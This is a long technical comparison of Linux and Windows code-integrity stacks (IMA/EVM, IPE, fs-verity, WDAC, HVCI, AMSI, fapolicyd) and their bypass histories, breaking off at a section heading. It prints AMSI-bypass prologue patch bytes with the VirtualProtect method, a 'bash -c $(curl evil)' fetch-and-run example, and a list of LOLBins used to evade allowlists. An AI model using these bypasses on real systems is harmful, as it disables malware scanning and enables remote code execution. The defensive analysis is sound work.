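The granularity mismatch can be sketched as a toy policy evaluator. This is an illustration only, not the App Control policy format: the `evaluate` function, the policy shape, and every hash value are hypothetical placeholders, and the one behaviour assumed from the real product is that explicit denies are checked before allows.

```javascript
// Toy policy: allow by signer, deny by hash; explicit denies win.
function evaluate(policy, binary) {
  if (policy.deniedHashes.has(binary.sha256)) return "deny";
  if (policy.allowedSigners.has(binary.signer)) return "allow";
  return "deny"; // default-deny for anything unlisted
}

// Placeholder binaries; the hash strings are made up for the sketch.
const mshtaOld = { name: "mshta.exe", signer: "Microsoft Corporation", sha256: "placeholder-hash-mshta-v1" };
const mshtaNew = { name: "mshta.exe", signer: "Microsoft Corporation", sha256: "placeholder-hash-mshta-v2" };
const unsignedTool = { name: "tool.exe", signer: null, sha256: "placeholder-hash-tool" };

const signerOnly = {
  allowedSigners: new Set(["Microsoft Corporation"]),
  deniedHashes: new Set(),
};
const withDenies = {
  allowedSigners: new Set(["Microsoft Corporation"]),
  deniedHashes: new Set([mshtaOld.sha256]),
};

console.log("signer-only, mshta v1: ", evaluate(signerOnly, mshtaOld));
console.log("signer-only, unsigned: ", evaluate(signerOnly, unsignedTool));
console.log("with denies, mshta v1: ", evaluate(withDenies, mshtaOld));
console.log("with denies, mshta v2: ", evaluate(withDenies, mshtaNew));
```

The last line is the maintenance burden in miniature: a deny keyed to one hash says nothing about the next signed build of the same binary, so the deny set has to grow with every release.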

Story D: fapolicyd's permissive-window failure

fapolicyd [@access-redhat-com-fapolicydsecurity-hardening] is the Red Hat userspace allowlister. It sits on the fanotify permission channel and answers "may this open or exec proceed?" against a compiled rule database. It does not have IMA's offline-tampering problem because trust is inherited from the RPM database: "An application is trusted when the system package manager correctly installs it and therefore registered in the system RPM database. The fapolicyd daemon uses the RPM database as a list of trusted binaries and scripts."

What it does have is an operational footgun. Setting permissive=1 "just for troubleshooting" silently disables enforcement. Terminating the daemon causes the kernel to fail open after the fanotify response timeout. The architectural choice -- userspace daemon over kernel-mode hook -- is what makes both failure modes possible.

Key idea: The check was strong. The boundary protecting the check was weak. On IMA-as-shipped the reference hash sat next to the file the attacker rewrote. On AMSI the scanner sat inside the process the attacker controlled. On WDAC the trust grant was wider than the exploitation unit. On fapolicyd the verifier was a userspace process that could be terminated. Four different stacks, four different boundary failures, one identical lesson.

Bypass class	Stack	Concrete example	Root cause
Offline metadata swap	IMA without EVM	Rewrite binary and matching `security.ima` xattr from rescue media	Reference value stored next to the file under attacker control
In-process scanner patch	AMSI in PowerShell	`mov eax, AMSI_RESULT_CLEAN; ret` over `AmsiScanBuffer` prologue	Scanner shares address space with the script host the attacker runs in
Signer-vs-binary mismatch	WDAC Publisher rules	Allow Microsoft-signed code, attacker runs `mshta.exe`	Trust grant is coarser than the exploitable unit
Daemon liveness	fapolicyd	Terminate `fapolicyd` or set `permissive=1`	Verifier is a userspace process with no kernel-rooted backstop

Each of these failures has the same shape: the check was strong, the boundary protecting the check was weak. Both operating systems noticed, and fixed it in 2012 and 2016 in very different ways. Both fixes followed the same principle.

5. The architectural pivots

Both lineages reached the same conclusion, four years apart: strengthen the boundary, not the check. Each pivot moved the trust boundary outward, beyond the place the attacker could reach.

EVM (Linux 3.2, January 2012): the xattrs become non-forgeable

The Extended Verification Module computes an HMAC over the security-relevant extended attributes -- security.ima, security.selinux, security.SMACK64, security.apparmor, security.capability -- plus inode metadata (UID, GID, mode, generation), and stores the result in security.evm. The HMAC key is loaded into the kernel keyring at boot, ideally sealed to a TPM 2.0 PCR set so the key is not retrievable except on a machine whose boot state matches the sealing measurement. The kernel keyring documentation for trusted and encrypted keys [@kernel-org-trusted-encryptedhtml] describes the substrate.

An offline attacker with disk access still cannot forge security.evm without the HMAC key. Digital-signature mode (EVM portable signatures, Linux 3.3) gives the same guarantee without any on-box key material. The check did not get cryptographically stronger: HMAC-SHA256 was not new in 2012. What changed was that the reference value the check consults moved from "an xattr next to the file" to "an xattr whose integrity is bound to a key the attacker does not have". Red Hat documents the modern setup in Enhancing security with the kernel integrity subsystem [@access-redhat-com-subsystemsecurity-hardening].
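The argument above can be sketched in a few lines. This is a toy model, not the kernel's format: xattrs are a Python dict, the EVM key is a random byte string, and the `evm_hmac` serialisation and the `appraise` helper are assumptions made for illustration.

```python
import hashlib
import hmac
import os

def file_digest(content: bytes) -> bytes:
    """Stand-in for the value IMA stores in security.ima."""
    return hashlib.sha256(content).digest()

def evm_hmac(key: bytes, xattrs: dict, uid: int, gid: int, mode: int) -> bytes:
    """Toy security.evm: HMAC over the protected xattrs plus inode metadata.

    The serialisation here is illustrative, not the kernel's real layout.
    """
    mac = hmac.new(key, digestmod=hashlib.sha256)
    for name in sorted(xattrs):
        mac.update(name.encode() + b"\0" + xattrs[name] + b"\0")
    mac.update(f"{uid}:{gid}:{mode:o}".encode())
    return mac.digest()

def appraise(key, content, xattrs, evm, uid, gid, mode) -> bool:
    """Allow only if the xattr set is authentic AND the content matches it."""
    expected = evm_hmac(key, xattrs, uid, gid, mode)
    if not hmac.compare_digest(expected, evm):
        return False
    return hmac.compare_digest(xattrs["security.ima"], file_digest(content))

# Provisioning on the trusted system; the key stays in the kernel keyring.
key = os.urandom(32)
good = b"original binary"
xattrs = {"security.ima": file_digest(good), "security.selinux": b"bin_t"}
evm = evm_hmac(key, xattrs, 0, 0, 0o755)

# Offline attacker: rewrites the file and a matching security.ima,
# but has to guess at security.evm because the key is out of reach.
evil = b"backdoored binary"
forged_xattrs = {**xattrs, "security.ima": file_digest(evil)}
forged_evm = evm_hmac(os.urandom(32), forged_xattrs, 0, 0, 0o755)

legit_ok = appraise(key, good, xattrs, evm, 0, 0, 0o755)
swap_ok = appraise(key, evil, forged_xattrs, evm, 0, 0, 0o755)
forge_ok = appraise(key, evil, forged_xattrs, forged_evm, 0, 0, 0o755)
```

Only `legit_ok` comes out true. The attacker's file and `security.ima` agree with each other, which is exactly what defeated IMA alone, but the pair no longer agrees with a `security.evm` the attacker cannot recompute.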

Extended Verification Module (EVM): The Linux integrity module that protects the security-relevant extended attributes IMA depends on. EVM computes an HMAC (or digital signature) over the xattr set plus inode metadata and stores it in `security.evm`. Without the EVM key, an offline attacker cannot rewrite a binary and its matching `security.ima` to produce a valid pair.

sequenceDiagram
    participant App as User app
    participant K as Kernel
    participant FS as Filesystem
    participant IMA as IMA
    participant EVM as EVM
    participant TPM as TPM keyring
    App->>K: execve("/usr/bin/foo")
    K->>IMA: bprm_check hook
    IMA->>FS: read file bytes
    IMA->>IMA: compute SHA-256
    IMA->>FS: read security.ima xattr
    IMA->>EVM: verify xattr integrity
    EVM->>FS: read security.evm and full xattr set
    EVM->>TPM: HMAC key from keyring (sealed to PCRs)
    EVM->>EVM: recompute HMAC over xattr set + inode meta
    alt HMAC matches and IMA hash matches
        EVM-->>IMA: ok
        IMA-->>K: allow
        K-->>App: exec proceeds
    else mismatch
        EVM-->>IMA: -EPERM
        IMA-->>K: deny
        K-->>App: -EPERM
    end

IMA-appraise (Linux 3.7, December 2012): from observation to enforcement

The merge cadence on the kernel side is itself part of the story. Measurement-only IMA shipped in 2.6.30 in 2009. EVM merged in 3.2 in January 2012. EVM digital signatures merged in 3.3 in March 2012. IMA-appraise, which finally lets the kernel return -EPERM on a hash mismatch, merged in Linux 3.7 in December 2012 [@lwn-net-articles-488906]. Three and a half years from "we hash files" to "we refuse to run files that fail the hash". The gap was not engineering laziness; it was the time it took to design and merge the boundary-strengthening pieces that made enforcement safe to enable.

HVCI / Memory Integrity (Windows 10 1607, August 2016): the secure kernel

Windows took the equivalent step four years later, but at a different layer. Virtualization-Based Security (VBS) [@learn-microsoft-com-oem-vbs] splits Windows into Virtual Trust Level 0 -- the normal kernel everyone has been writing rootkits for since 1993 -- and Virtual Trust Level 1, a small secure kernel hosted by Hyper-V. The kernel-mode Code Integrity check that gates loading of every driver is moved into VTL1. A VTL0 attacker with full SYSTEM, even one who has loaded a malicious driver, cannot patch the VTL1 verifier; they cannot even read its memory.

Virtualization-Based Security (VBS): Windows' Hyper-V-rooted split that puts a small secure kernel in VTL1, isolated from the normal Windows kernel (VTL0) by the hypervisor. Hypervisor-protected Code Integrity (HVCI), exposed in Windows Settings as "Memory integrity", uses VTL1 to host the kernel-mode code-integrity check, so a VTL0 attacker with SYSTEM cannot patch the verifier or downgrade its policy.

Microsoft's HVCI documentation [@learn-microsoft-com-oem-vbs] frames the W^X invariant HVCI enforces on kernel pages: "memory integrity ... protects and hardens Windows by running kernel mode code integrity within the isolated virtual environment of VBS ... ensuring that kernel memory pages are only made executable after passing code integrity checks inside the secure runtime environment, and executable pages themselves are never writable." A kernel page can be writable or executable; never both at the same time. The split is enforced by the hypervisor.

"HVCI", "Memory Integrity", and "kernel-mode code integrity running in VBS" are the same mechanism. Microsoft's product-name churn here is unusually thick: the Windows Settings UI calls it Memory Integrity, the documentation page is titled "Enable virtualization-based protection of code integrity", the underlying capability is HVCI, and Microsoft also markets the same hardware-and-software bundle as "Secured-Core PC".

flowchart TD
    subgraph VTL0[VTL0: normal Windows kernel]
        P[User process]
        DRV[Driver load request]
        RK[Hypothetical rootkit with SYSTEM]
        K0[NT kernel]
        P --> K0
        DRV --> K0
        RK --> K0
    end
    K0 -->|hypercall: verify driver| HV[Hypervisor]
    RK -.X.-> SK
    HV --> SK
    subgraph VTL1[VTL1: secure kernel]
        SK[Secure kernel]
        CI[Kernel-mode CI verifier]
        SK --> CI
    end
    CI -->|allow / deny| HV
    HV -->|result| K0

IPE (Linux 6.12, November 2024): property-based decisions

The most recent Linux pivot moves further still. Integrity Policy Enforcement [@docs-kernel-org-lsm-ipehtml], upstreamed in Linux 6.12 in November 2024 from a Microsoft-contributed patch series (source on GitHub [@github-com-microsoft-ipe]), does not hash files at all. Its kernel documentation is explicit: "Integrity Policy Enforcement (IPE) is a Linux Security Module that takes a complementary approach to access control. Unlike traditional access control mechanisms that rely on labels and paths for decision-making, IPE focuses on the immutable security properties inherent to system components." A policy rule looks like:

op=EXECUTE dmverity_signature=TRUE dmverity_roothash=sha256:<hex> action=ALLOW
op=EXECUTE fsverity_signature=TRUE action=ALLOW
op=EXECUTE action=DENY

The kernel is not asked "what is the SHA-256 of this file?" at op=EXECUTE time. It is asked "did this file come from a dm-verity device whose root hash matches one of our trusted signatures?" The verifier has nothing to compute per access; it has only to read a pre-computed property. The trust boundary has moved out to whoever signed the dm-verity image at build time.
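A minimal sketch of that decision shape, assuming top-to-bottom, first-match evaluation. It is a toy model, not IPE's parser: `parse_rule`, `evaluate`, and the `DENY` fallback are hypothetical, and the example policy drops the `dmverity_roothash` pin to keep the rules short. In the real system the kernel sets the properties when the device or file is set up; here they are plain dict entries.

```python
from dataclasses import dataclass, field

@dataclass
class Rule:
    op: str
    action: str
    props: dict = field(default_factory=dict)

def parse_rule(line: str) -> Rule:
    """Parse 'op=X key=value ... action=Y' into a Rule (toy grammar)."""
    pairs = dict(token.split("=", 1) for token in line.split())
    op = pairs.pop("op")
    action = pairs.pop("action")
    return Rule(op=op, action=action, props=pairs)

def evaluate(rules, op: str, file_props: dict) -> str:
    """First matching rule wins; nothing is hashed at decision time."""
    for rule in rules:
        if rule.op != op:
            continue
        if all(file_props.get(k) == v for k, v in rule.props.items()):
            return rule.action
    return "DENY"  # assumed fallback for the sketch when no rule matches

POLICY = [parse_rule(line) for line in (
    "op=EXECUTE dmverity_signature=TRUE action=ALLOW",
    "op=EXECUTE fsverity_signature=TRUE action=ALLOW",
    "op=EXECUTE action=DENY",
)]

# Properties are precomputed facts about where the file came from.
signed_volume = {"dmverity_signature": "TRUE"}
signed_file = {"fsverity_signature": "TRUE"}
scratch_file = {"dmverity_signature": "FALSE", "fsverity_signature": "FALSE"}

verdict_volume = evaluate(POLICY, "EXECUTE", signed_volume)
verdict_file = evaluate(POLICY, "EXECUTE", signed_file)
verdict_scratch = evaluate(POLICY, "EXECUTE", scratch_file)
```

The per-access work is a handful of dictionary comparisons. All the cryptography happened earlier, when the volume or file acquired its properties.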

fs-verity (Linux 5.4, November 2019): O(log n) per page

The cryptographic complement is fs-verity [@kernel-org-filesystems-fsverityhtml], upstreamed in Linux 5.4 in November 2019 by Eric Biggers and Theodore Ts'o at Google. The kernel docs describe the trick: "fs-verity is similar to dm-verity but works on files rather than block devices ... userspace can execute an ioctl that causes the filesystem to build a Merkle tree for the file and persist it to a filesystem-specific location ... Userspace can use another ioctl to retrieve the root hash ... in constant time, regardless of the file size."

The Merkle tree turns whole-file hashing into O(log n) verification per page read, with constant-time digest retrieval. Concretely, an APK or container layer with thousands of pages does not need a full hash on first open; the page cache verifies the leaves and intermediate Merkle nodes only for the pages actually touched. IMA can consume fs-verity's digest directly through the digest_type=verity modifier in its policy language.
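The per-page claim is easier to see in code. The sketch below uses a binary tree with 4 KiB leaves for readability. fs-verity itself packs many hashes into each tree block, so its trees are much shallower, and the helper names here (`build_levels`, `proof_for`, `verify_block`) are hypothetical.

```python
import hashlib

BLOCK = 4096  # assumed leaf size for the sketch

def h(data: bytes) -> bytes:
    return hashlib.sha256(data).digest()

def build_levels(data: bytes) -> list:
    """Return tree levels, leaves first; the last level holds the root."""
    blocks = [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)] or [b""]
    level = [h(b) for b in blocks]
    levels = [level]
    while len(level) > 1:
        if len(level) % 2:                 # pad odd levels with the last node
            level = level + [level[-1]]
            levels[-1] = level
        level = [h(level[i] + level[i + 1]) for i in range(0, len(level), 2)]
        levels.append(level)
    return levels

def proof_for(levels: list, index: int) -> list:
    """Sibling hashes from leaf to root for block `index`."""
    path = []
    for level in levels[:-1]:
        path.append(level[index ^ 1])
        index //= 2
    return path

def verify_block(block: bytes, index: int, path: list, root: bytes) -> bool:
    """Recompute the root from one block plus O(log n) sibling hashes."""
    node = h(block)
    for sibling in path:
        node = h(node + sibling) if index % 2 == 0 else h(sibling + node)
        index //= 2
    return node == root

# Ten distinct 4 KiB blocks; only block 7 is ever "read".
data = b"".join(bytes([i]) * BLOCK for i in range(10))
levels = build_levels(data)
root = levels[-1][0]
path = proof_for(levels, 7)

block7 = data[7 * BLOCK:8 * BLOCK]
ok = verify_block(block7, 7, path, root)
tampered = verify_block(b"\xff" * BLOCK, 7, path, root)
```

Verifying block 7 touches four sibling hashes instead of the other nine blocks. Doubling the file size adds one hash to the path, not another pass over the data.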

The breakthrough was not a stronger check. It was moving the check out of the attacker's address space.

Each pivot moved the trust boundary outward in a different direction. EVM moved the integrity root from "xattr next to the file" to "HMAC-keyed xattr, key sealed to TPM PCRs". HVCI moved the kernel-mode verifier from "in the kernel the attacker can patch" to "in a secure kernel the attacker cannot reach without breaking the hypervisor". IPE moved the per-access decision from "recompute a file's hash" to "look up a precomputed property". fs-verity is the complement rather than a boundary move: it collapsed the per-access cost from O(n) on the file to O(log n) on a Merkle path.

The crypto was already strong. The breakthrough was the geometry of where the verifier lived.

By 2020 both stacks looked dramatically different from their 2009 and 2015 originals. Here is what each one looks like today, side by side.

6. The stack today, side by side

Eleven moving parts. Here is how they line up.

Linux	Windows	Layer
IMA appraise + EVM	App Control (WDAC) UMCI	User-mode code integrity
Kernel module signing	App Control + HVCI driver enforcement	Kernel-mode code integrity
fs-verity + dm-verity	HVCI page-level W^X + signed catalogues	Page-level integrity
AppArmor / SELinux	(no direct analogue; closest is AppContainer / ASR)	Mandatory access control
fapolicyd	App Control + AppLocker	User-space allowlist
IPE	App Control (FilePath / hash rules)	Property-based code integrity
(no direct analogue)	AMSI	Script content scan
(no direct analogue)	Smart App Control + ISG	Cloud reputation

The mapping is not 1-to-1 in either direction. Linux composes; Windows consolidates. To compare meaningfully we have to look at each layer in turn.

6.1 Code-integrity enforcers: IMA + EVM vs WDAC vs IPE

Dimension	Linux IMA + EVM	WDAC (App Control)	IPE
Enforcement layer	VFS / LSM hook (file open, mmap, exec)	PE loader (kernel CI, user-mode CI)	LSM hook on `op=EXECUTE`
Identity primitive	File-content hash or `imasig` / `modsig` / `sigv3`	Authenticode chain, hash, FilePath, or ISG	dm-verity root hash / fs-verity digest
Policy expression	Procedural rules (`func=` / `mask=` / `fsmagic=`)	Signed XML compiled to binary `.p7b`	Signed plain-text DFA
Worst-case per-access	O(n) hash on first access; O(1) cached	O(1) cached; O(n) hash on cache miss	O(1) (properties precomputed)
Fail-closed mode	Yes (appraise)	Yes (enforced)	Yes
Remote-attestation friendly	Yes (TPM PCR 10)	Indirect (Measured Boot logs)	Indirect
Bypass arms race	Whole-disk swap (countered by EVM key sealing)	LOLBins (Microsoft block list + community LOLBAS)	Limited surface (DFA-only)

The IMA policy ABI [@kernel-org-testing-imapolicy] documents the full rule grammar: action [condition ...] where action is one of measure | dont_measure | appraise | dont_appraise | audit | hash | dont_hash, and conditions select on func=, mask=, fsmagic=, fsuuid=, uid=, fowner=, LSM-label predicates, and the all-important appraise_type= modifier that names the signature scheme. IMA template management [@docs-kernel-org-ima-templateshtml] controls what gets recorded per measurement-list entry; the two templates used in practice today are ima-ng (d-ng|n-ng: hash-algo-prefixed digest plus name) and ima-sigv2 (d-ngv2|n-ng|sig: versioned digest plus name plus signature).

WDAC's policy rule reference [@learn-microsoft-com-to-create] defines the rule kinds operators actually write: Publisher, PcaCertificate, LeafCertificate, FileName, Version, Hash (SHA-1, SHA-256, or SHA-384), FilePath (added in 1903 and explicitly weaker because a user with write access can substitute the file), Managed Installer, and Intelligent Security Graph. The compiled output is a signed binary .p7b CIPolicy.

The same doc records a default that has surprised many operators: until a rule option says otherwise, a policy restricts only kernel-mode code. "We recommend that you use Enabled:Audit Mode initially because it allows you to test new App Control policies before you enforce them ... By default, only kernel-mode binaries are restricted. Enabling the following rule option validates user mode executables and scripts." The Enabled:UMCI flag is what flips a WDAC policy from kernel-only to full user-mode enforcement.

flowchart LR
    PE[PE load request] --> AC[Parse Authenticode signature]
    AC --> RM[Match rule set]
    RM --> P[Publisher / cert rule?]
    P -->|hit| AL[Allow]
    P -->|miss| H[Hash rule?]
    H -->|hit| AL
    H -->|miss| FP[FilePath rule?]
    FP -->|hit| AL
    FP -->|miss| MI[Managed Installer?]
    MI -->|hit| AL
    MI -->|miss| ISG[Intelligent Security Graph?]
    ISG -->|hit| AL
    ISG -->|miss| DEF[Default action]
    AL --> BL{"In bypass-list deny?"}
    BL -->|yes| BLK[Block]
    BL -->|no| LOAD[Loader continues]
    DEF --> BLK

6.2 Mandatory access control: AppArmor vs SELinux

Dimension	AppArmor	SELinux
Model	Path-based allowlist per binary	Type-enforcement on subject x object x class
Storage of policy state	In-memory DFA loaded from user space	`security.selinux` xattr + compiled `policy.31`
Granularity	Profile per executable	Per-type, per-class, per-operation
Survives file rename	No (path is the identity)	Yes (xattr travels with inode)
Default-on distros	Ubuntu, openSUSE, SLES	RHEL, Fedora, Oracle Linux, Android, ChromeOS
Authoring tools	`aa-genprof`, `aa-logprof`, `aa-enforce`	`audit2allow`, `semodule`, refpolicy, `udica`

AppArmor's kernel documentation [@docs-kernel-org-lsm-apparmorhtml] describes the model directly: "AppArmor is MAC style security extension for the Linux kernel. It implements a task centered policy, with task 'profiles' being created and loaded from user space." A profile reads like a rule file rather than a label algebra:

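# The profile attaches by executable path; the path is the identity.
/usr/sbin/nginx {
  capability net_bind_service,   # bind to ports below 1024
  /etc/nginx/** r,               # read configuration, recursively
  /var/log/nginx/* w,            # write log files
  /var/www/** r,                 # read served content, recursively
  network inet stream,           # IPv4 TCP sockets
}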

The user-space `apparmor_parser` compiles each profile to a DFA that the kernel loads, so policy lookup is O(L) in path length. SELinux's compiled policy uses a hash-table query against compiled type-enforcement rules with an in-memory access-vector cache for O(1) hot decisions. Both are practical; they differ on which model fits the way an administrator thinks. AppArmor wins on auditability and quick authoring; SELinux wins on expressiveness and on what the Wikipedia summary [@en-wikipedia-org-security-enhancedlinux] calls Mandatory Access Control for multi-level security. Smack [@schaufler-ca-com] is a third in-tree LSM, simpler than SELinux, used heavily by Tizen.

Red Hat's `fapolicyd` is the answer for operators who want App Control-style allowlisting without rebuilding the kernel. Trust is inherited from the RPM database; the daemon sits on the kernel's `fanotify` permission channel and answers ALLOW or DENY on every `open` and `exec`. Per the RHEL hardening guide [@access-redhat-com-fapolicydsecurity-hardening], rule files in `/etc/fapolicyd/rules.d/` are concatenated in lexicographic order into `compiled.rules`. The Red Hat-shipped numbered prefixes are 10 (language interpreters), 20 (dracut), 21 (updaters), 30 (patterns), 40/41/42 (ELF), 70 (trusted languages), 72 (shell), 90 (deny-execute), 95 (allow-open). First-match-wins evaluation means operators adding custom rules must give their file a number lower than 90 to ensure their `allow` is reached before the catch-all deny.
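The ordering trap is easy to reproduce in a toy model. The sketch below is not fapolicyd's rule syntax: the `Rule` type, the file names, and the allow-on-no-match fallback are assumptions chosen to show only the two properties described above, lexicographic concatenation and first-match-wins.

```python
from dataclasses import dataclass
from typing import Callable

@dataclass
class Rule:
    decision: str                      # "allow" or "deny"
    perm: str                          # "execute" or "open"
    matches: Callable[[str], bool]     # predicate on the object path

def compile_rules(rules_d: dict) -> list:
    """Concatenate rule files in lexicographic filename order."""
    compiled = []
    for filename in sorted(rules_d):
        compiled.extend(rules_d[filename])
    return compiled

def decide(compiled: list, perm: str, path: str) -> str:
    """First matching rule wins; later rules are never consulted."""
    for rule in compiled:
        if rule.perm == perm and rule.matches(path):
            return rule.decision
    return "allow"  # assumption for the sketch: no match means allow

catch_all_deny = Rule("deny", "execute", lambda p: True)
custom_allow = Rule("allow", "execute", lambda p: p.startswith("/opt/acme/"))

# Hypothetical file names: the custom rule sorted after, then before, 90.
too_late = compile_rules({"90-deny-execute.rules": [catch_all_deny],
                          "95-custom.rules": [custom_allow]})
in_time = compile_rules({"90-deny-execute.rules": [catch_all_deny],
                         "80-custom.rules": [custom_allow]})

late_verdict = decide(too_late, "execute", "/opt/acme/tool")
early_verdict = decide(in_time, "execute", "/opt/acme/tool")
```

The same `allow` rule yields `deny` when its file sorts after the catch-all and `allow` when it sorts before. The rule text never changed; only the filename prefix did.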

6.3 Hypervisor-anchored CI: HVCI

HVCI's runtime cost is dominated by the hypercall round-trip from VTL0 to VTL1 on driver load and on each executable-page allocation. Steady-state overhead is small on hardware with the right capabilities.

Microsoft's HVCI documentation [@learn-microsoft-com-code-integrity] names the dependency: "Memory integrity works better with Intel Kabylake and higher processors with Mode-Based Execution Control, and AMD Zen 2 and higher processors with Guest Mode Execute Trap capabilities. Older processors rely on an emulation of these features, called Restricted User Mode, and will have a bigger impact on performance." Practitioner-visible rule of thumb: less than 5 percent overhead on MBEC/GMET-capable silicon, 10 to 20 percent on kernel-bound workloads when the CPU has to emulate.

HVCI hardware prerequisites per the OEM VBS guidance [@learn-microsoft-com-oem-vbs]: 64-bit CPU with virtualization extensions (VT-x or AMD-V), second-level address translation (EPT or RVI), an IOMMU (VT-d or AMD-Vi), TPM 2.0, UEFI MAT, Secure MOR v2, and ideally MBEC (Intel) or GMET (AMD).

6.4 Script-level inspection: AMSI vs Linux's gap

Dimension	AMSI	Linux IMA on scripts
What it sees	Deobfuscated script buffer at execution time	Whole-file content at `open` or `mmap`
Coverage	PowerShell, WSH, VBA, JScript, MSHTA, UAC installers, .NET, Edge	Any file whose `func=FILE_CHECK` rule matches
Provider model	COM `IAntimalwareProvider` per process	None; kernel verifies signature directly
Defends against runtime obfuscation	Yes (sees final buffer)	No (sees file as written)
Trust boundary	Wrong (in-process; patchable by attacker)	Right (kernel-side; attacker cannot patch)

The asymmetry is the point. AMSI sees what the interpreter is about to evaluate; IMA sees only what is on disk. AMSI catches in-memory PowerShell payloads, Office macros that decode themselves at runtime, and Invoke-Expression evaluations that never touched the filesystem. IMA's hash is final at file write time and tells you exactly nothing about what bash -c "$(curl evil)" will execute.

Constrained Language Mode (CLM): The reduced PowerShell language mode App Control forces on systems with UMCI enabled. It blocks reflection (the `[System.Reflection]` namespace), dynamic-type creation, and arbitrary .NET API calls. It is the runtime-side complement to App Control: even if a script gets in, its evaluation surface is dramatically reduced. This is also what makes the `amsiInitFailed` flag-flip bypass non-trivial under modern App Control: the reflection needed to set the flag is blocked.

6.5 Cloud reputation: Smart App Control

Smart App Control [@learn-microsoft-com-business-appcontrol] ships as a pre-baked WDAC policy bundled with Windows 11 22H2 and later. The App Control overview describes it as the consumer-facing entry point that brings application control to home users. On every fresh install SAC starts in evaluation mode for 48 hours, during which Microsoft's cloud reputation service silently observes the user's app inventory. On enterprise-managed devices SAC auto-disables at the end of the window unless the user explicitly opts in. Once disabled by user, policy, or the auto-disable rule, it can only be re-enabled by performing a clean install of Windows; running Settings > Reset This PC is not sufficient.

Three quirks operators must understand. First, evaluation lasts 48 hours and is silent. Second, enterprise-managed (Intune, AAD-joined, GPO-managed) devices auto-disable at evaluation end. Third, disable is one-way: there is no "restart evaluation" path. The intended deployment model is that enterprises use full App Control with a managed-installer policy, not SAC. Consumers with a small app footprint and no IT team get a cloud-driven allowlist for free; everyone else is expected to author a policy.

Note: Once Smart App Control is off on a device, it can only be re-enabled by performing a clean install of Windows. Running Settings > Reset This PC does not re-enable SAC. Treat enabling SAC as a deployment decision, not a casual toggle.

6.6 fs-verity as the per-file Merkle layer

For the data-at-rest performance story, fs-verity's ioctl(FS_IOC_ENABLE_VERITY) builds the Merkle tree, persists it next to the file, and switches the file to read-only. FS_IOC_MEASURE_VERITY returns the digest in constant time. IMA's policy language gained appraise_type=sigv3 and the digest_type=verity modifier so a rule like

appraise func=BPRM_CHECK fsmagic=0xef53 appraise_type=sigv3 digest_type=verity

asks the filesystem for the file's fs-verity digest (O(1)) and verifies the kernel-stored signature over that digest, rather than re-hashing the file even on first access. Supported on ext4, f2fs, and btrfs.

Eleven mechanisms, two architectures, one shared shape: an allowlist of trusted producers plus a hook that can refuse to honour anything outside it. The allowlist of producers is the deepest common assumption, and it is also where the next class of attacks lives.

7. Bypass arms races

Every code-integrity system on the market is in a continuous fight with the bypass it shipped with. The fights tell you what each architecture got wrong.

The AMSI bypass family

The three single-shot techniques from Section 4 -- prologue patch, amsiInitFailed flag flip, library unload -- have all been answered by partial mitigations. Microsoft has hardened AMSI provider loading [@learn-microsoft-com-interface-portal] to require Authenticode-signed provider DLLs from Windows 10 1903 onward. Defender ships ETW-based detection that flags in-memory patches to amsi.dll. Constrained Language Mode (forced by App Control) blocks the reflection needed to flip AmsiUtils.amsiInitFailed. None of these closes the structural problem. AMSI is by design a function call inside the script host. As long as the host process is the trust boundary, the attacker who reaches the host process wins.

The trust boundary is wrong: the host process making the AMSI call is the same process the attacker is running in. The simplest in-memory patch overwrites `AmsiScanBuffer`'s prologue with a three-byte sequence that zeroes EAX (the same numeric value as `S_OK` and `AMSI_RESULT_CLEAN`) and returns before any scan happens:

xor eax, eax    ; 31 C0
ret             ; C3

or, in the six-byte variant, returns a failure HRESULT that the script host treats as "no detection":

mov eax, 0x80070057   ; B8 57 00 07 80   (HRESULT E_INVALIDARG)
ret                   ; C3

Both variants are detected by modern Defender via the ETW patch detection, but neither requires kernel privileges to apply: a `VirtualProtect` call to make the page writable and a short write from inside the host process are enough.

The WDAC LOLBin arms race

Microsoft's App Control bypass list [@learn-microsoft-com-bypass-appcontrol] is a maintained document that any non-trivial WDAC policy must merge into its deny rules. The 40-plus entries include mshta.exe, wscript.exe, cscript.exe, msbuild.exe, Microsoft.Build.dll, windbg.exe, cdb.exe, kd.exe, dotnet.exe, csi.exe, rcsi.exe, addinprocess.exe, addinutil.exe, aspnet_compiler.exe, bash.exe, wsl.exe, runscripthelper.exe, system.management.automation.dll, and webclnt.dll / davsvc.dll. The community LOLBAS index [@lolbas-project-github-io] widens the field to roughly 200 entries with MITRE ATT&CK technique IDs.

Tooling (the WDAC Wizard, AaronLocker, Microsoft's ConfigCI PowerShell module, CiTool.exe) automates merging the deny set into a base policy and deploying the result through Intune. The asymmetry is the bottom line: trust granted at signer granularity, exploitation at binary granularity. The deny list is not a fix; it is a treadmill.
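A toy model of the treadmill, assuming a policy with one publisher-level allow and a set of hash-level denies that are checked first. The `Binary` type, the `evaluate` function, and the file contents are hypothetical placeholders. Real policies also deny by file name and version, which this sketch leaves out.

```python
import hashlib
from dataclasses import dataclass

@dataclass(frozen=True)
class Binary:
    name: str
    publisher: str
    content: bytes

    @property
    def sha256(self) -> str:
        return hashlib.sha256(self.content).hexdigest()

def evaluate(binary, allowed_publishers, denied_hashes) -> str:
    """Explicit hash denies are checked before the coarse publisher allow."""
    if binary.sha256 in denied_hashes:
        return "BLOCK"
    if binary.publisher in allowed_publishers:
        return "ALLOW"
    return "BLOCK"

# Two builds of the same signed binary, plus an unsigned tool.
old_mshta = Binary("mshta.exe", "Microsoft Corporation", b"mshta build 1")
new_mshta = Binary("mshta.exe", "Microsoft Corporation", b"mshta build 2")
unsigned = Binary("tool.exe", "", b"unsigned tool")

allowed = {"Microsoft Corporation"}
denied = {old_mshta.sha256}          # the deny list knows only the old build

verdicts = [evaluate(b, allowed, denied)
            for b in (old_mshta, new_mshta, unsigned)]
```

The old build is blocked and the unsigned tool never had a chance, but the new build sails through on the publisher rule until someone adds its hash. That gap between shipping and denying is the treadmill.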

LOLBin (living-off-the-land binary): A trusted binary, often shipped by the OS vendor and signed by the vendor's code-signing certificate, that an attacker re-purposes to bypass an allowlist or to perform actions that would be blocked if attempted with non-vendor tooling. Examples on Windows: `mshta.exe` to evaluate HTA scripts, `regsvr32.exe` to execute a remote scriptlet, `installutil.exe` to run code via a designed-for-development assembly loader.

fapolicyd permissive-window

This is not a cryptographic bypass; it is the architectural choice (userspace daemon over fanotify) showing its operational seam. A privileged operator who sets permissive=1 to debug a noisy rule and forgets to revert has silently disabled enforcement. If the daemon dies under load or after a bad rule deploy, the kernel waits for the fanotify response timeout and then fails open. There is no failsafe equivalent of HVCI's "the verifier is in another address space" guarantee.

IMA / EVM offline-key attacks

